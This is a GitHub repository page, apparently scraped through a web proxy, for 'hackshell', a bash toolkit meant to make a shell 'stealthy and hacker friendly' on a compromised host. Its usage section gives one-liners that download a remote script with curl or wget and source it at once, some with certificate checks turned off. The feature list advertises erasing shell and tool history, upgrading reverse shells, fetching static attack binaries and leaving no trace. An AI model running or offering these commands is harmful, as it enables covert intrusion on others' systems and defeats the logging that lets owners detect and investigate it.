8000 GitHub - extencil/hackshell: Make BASH stealthy and hacker friendly with lots of bash functions
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

extencil/hackshell

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

48 Commits
 
 
 
 
 
 

Repository files navigation

hackshell

Make BASH stealthy and hacker friendly with lots of bash functions

Usage:

 source <(curl -SsfL https://thc.org/hs)
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

Ignore SSL / Certificate warnings:

 source <(curl -kSsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
 source <(wget --no-check-certificate -q -O- https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

Some features:

  • unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
  • Upgrates to PTY shell (if reverse shell)
  • Creates hacker-friendly shortcuts, bash-functions and aliases
  • Static binary download by simple bin <command> (e.g. bin nmap)
  • Does not write ANY data to the harddrive
  • Leaves no trace

hackshell

About

Make BASH stealthy and hacker friendly with lots of bash functions

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 100.0%
0